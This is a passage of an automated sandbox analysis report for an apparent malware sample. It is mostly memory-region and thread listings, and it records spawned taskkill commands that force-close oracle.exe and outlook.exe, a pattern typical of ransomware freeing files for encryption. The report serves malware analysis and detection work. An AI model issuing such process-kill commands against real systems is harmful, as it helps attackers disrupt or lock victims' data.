Region: id = 1744 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1745 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1746 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1747 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1748 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1749 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1750 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1751 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1752 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1753 start_va = 0x7fef6ff0000 end_va = 0x7fef7015fff entry_point = 0x7fef6ff0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2926 start_va = 0x7fef4040000 end_va = 0x7fef4239fff entry_point = 0x7fef4040000 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 2927 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2928 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2929 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3603 start_va = 0x1380000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 3604 start_va = 0x1510000 end_va = 0x158ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 3605 start_va = 0x1590000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 3606 start_va = 0x1650000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 3607 start_va = 0x16f0000 end_va = 0x176ffff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 3608 start_va = 0x1770000 end_va = 0x17effff entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 3609 start_va = 0x17f0000 end_va = 0x186ffff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 3610 start_va = 0x1920000 end_va = 0x199ffff entry_point = 0x0 region_type = private name = "private_0x0000000001920000" filename = "" Region: id = 3611 start_va = 0x19a0000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 3612 start_va = 0x1a20000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 3613 start_va = 0x1aa0000 end_va = 0x1b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 3614 start_va = 0x1b20000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b20000" filename = "" Region: id = 3615 start_va = 0x1bc0000 end_va = 0x1c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 3616 start_va = 0x1c50000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 3617 start_va = 0x1d40000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 3618 start_va = 0x1e00000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 3619 start_va = 0x1e80000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3620 start_va = 0x1f00000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 3621 start_va = 0x2030000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 3622 start_va = 0x2130000 end_va = 0x21affff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 3623 start_va = 0x2230000 end_va = 0x22affff entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 3624 start_va = 0x22b0000 end_va = 0x232ffff entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 3625 start_va = 0x7fef8f40000 end_va = 0x7fef8f47fff entry_point = 0x7fef8f40000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 3626 start_va = 0x7fffff82000 end_va = 0x7fffff83fff entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 3627 start_va = 0x7fffff84000 end_va = 0x7fffff85fff entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 3628 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 3629 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 3630 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 3631 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 3632 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 3633 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 3634 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 3635 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 3636 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 3637 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 3638 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 3639 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 3640 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 3641 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 3642 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 3643 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 3644 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 3645 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3646 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Thread: id = 162 os_tid = 0xc0 Thread: id = 163 os_tid = 0xbc0 Thread: id = 164 os_tid = 0xbbc Thread: id = 165 os_tid = 0xbb8 Thread: id = 166 os_tid = 0xbb4 Thread: id = 167 os_tid = 0xb7c Thread: id = 168 os_tid = 0xb48 Thread: id = 296 os_tid = 0xda4 Thread: id = 297 os_tid = 0xda8 Thread: id = 299 os_tid = 0xdb0 Thread: id = 304 os_tid = 0xdcc Thread: id = 307 os_tid = 0xddc Thread: id = 310 os_tid = 0xdf4 Thread: id = 312 os_tid = 0xe04 Thread: id = 314 os_tid = 0xe0c Thread: id = 317 os_tid = 0xe18 Thread: id = 320 os_tid = 0xe24 Thread: id = 321 os_tid = 0xe28 Thread: id = 322 os_tid = 0xe2c Thread: id = 323 os_tid = 0xe30 Thread: id = 326 os_tid = 0xe48 Thread: id = 330 os_tid = 0xe78 Thread: id = 333 os_tid = 0xe88 Thread: id = 336 os_tid = 0xe94 Thread: id = 338 os_tid = 0xe9c Thread: id = 342 os_tid = 0xeac Thread: id = 347 os_tid = 0xecc Thread: id = 352 os_tid = 0xef0 Thread: id = 353 os_tid = 0xefc Thread: id = 455 os_tid = 0x1034 Thread: id = 457 os_tid = 0x103c Thread: id = 459 os_tid = 0x1044 Thread: id = 460 os_tid = 0x104c Thread: id = 463 os_tid = 0x1058 Thread: id = 464 os_tid = 0x1060 Thread: id = 502 os_tid = 0x11ec Thread: id = 503 os_tid = 0x11fc Thread: id = 523 os_tid = 0x136c Process: id = "25" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x259bc000" os_pid = "0x900" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM oracle.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1881 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1882 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1883 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1884 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1885 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1886 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1887 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1888 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1889 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1890 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1891 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1892 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1893 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1894 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1895 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2302 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2303 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2304 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2305 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2306 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2307 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2308 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2309 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2310 start_va = 0x190000 end_va = 0x24ffff entry_point = 0x190000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2311 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 2312 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 2313 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 2314 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2315 start_va = 0x4d0000 end_va = 0x657fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2316 start_va = 0x660000 end_va = 0x7e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 2317 start_va = 0x7f0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 2318 start_va = 0x1c30000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 2319 start_va = 0x1d40000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2320 start_va = 0x1e60000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 2321 start_va = 0x1f50000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 2322 start_va = 0x1fd0000 end_va = 0x204ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 2323 start_va = 0x2050000 end_va = 0x231efff entry_point = 0x2050000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2324 start_va = 0x2350000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 2325 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2326 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2327 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2328 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2329 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2330 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2331 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2332 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2333 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2334 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2335 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2336 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2337 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2338 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2339 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2340 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2341 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2342 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2343 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2344 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2345 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2346 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2347 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2348 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2349 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2350 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2351 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2352 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2353 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2354 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2355 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2356 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2357 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2358 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2359 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2360 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2361 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2362 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2363 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2364 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Thread: id = 177 os_tid = 0x8f8 Thread: id = 210 os_tid = 0xa88 Thread: id = 216 os_tid = 0x570 Thread: id = 218 os_tid = 0x590 Thread: id = 219 os_tid = 0x1e0 Process: id = "26" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x9fdc000" os_pid = "0x8c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM outlook.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1896 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1897 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1898 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1899 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1900 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1901 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1902 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1903 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1904 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1905 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1906 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1907 start_va = 0x7fffffdf000 end_va = 